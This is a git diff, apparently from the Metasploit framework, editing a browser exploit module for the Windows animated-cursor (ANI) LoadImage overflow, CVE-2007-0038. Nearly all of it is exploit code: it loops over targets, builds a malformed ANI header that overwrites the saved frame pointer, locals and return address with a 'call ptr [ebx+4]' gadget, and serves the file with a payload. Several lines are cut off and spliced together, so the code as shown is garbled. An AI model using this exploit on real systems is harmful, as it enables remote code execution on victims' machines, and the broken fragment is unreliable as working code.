diff --git a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb index 5fab17cb12..5050262024 100644 --- a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb @@ -146,6 +146,9 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote mytargs = (target.name =~ /All Targets/) ? targets : [target] mytargs.each_index do |i| + + next if not mytargs[i].ret + html << "
'application/octet-stream' }) + send_response(cli, generate_ani(p, target), { 'Content-Type' => 'application/octet-stream' }) handler(cli) end - def generate_ani(payload) + def generate_ani(payload, target) # Build the first ANI header anih_a = [ @@ -201,8 +206,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote anih_b = nil - case target.name - when /Vista/ + if (target.name =~ /Vista/) # Vista has ebp=80, eip=84 anih_b = anih_a + rand_text(84-anih_a.length) @@ -215,7 +219,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote # Overwrite locals with invalid pointers anih_b[64, 12] = [0x80000000 | rand(0xffffffff)].pack('V') * 3 end - + # Overwrite the return with address of a "call ptr [ebx+4]" anih_b << [target.ret].pack('V')[0, target['Len'] ? target['Len'] : 4]